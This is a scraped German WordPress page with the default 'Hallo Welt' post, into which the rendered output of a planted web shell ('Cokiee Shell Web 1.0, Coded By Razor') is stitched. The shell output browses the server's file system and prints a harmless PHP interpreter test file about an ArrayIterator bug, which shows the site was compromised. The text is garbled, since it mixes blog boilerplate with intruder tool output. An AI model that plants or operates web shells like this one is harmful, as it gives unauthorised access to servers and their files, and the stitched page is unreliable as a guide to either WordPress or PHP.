Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/spl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/spl/tests/bug71028.phpt |
--TEST-- Bug #71028 (Undefined index with ArrayIterator) --FILE-- <?php function cast(&$a) { $a = (int)$a; } $a = new ArrayIterator; $a[-1] = 123; $b = "-1"; cast($b); var_dump(isset($a[$b])); $a[$b] = "okey"; var_dump($a[$b]); unset($a[$b]); var_dump(isset($a[$b])); ?> --EXPECT-- bool(true) string(4) "okey" bool(false)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare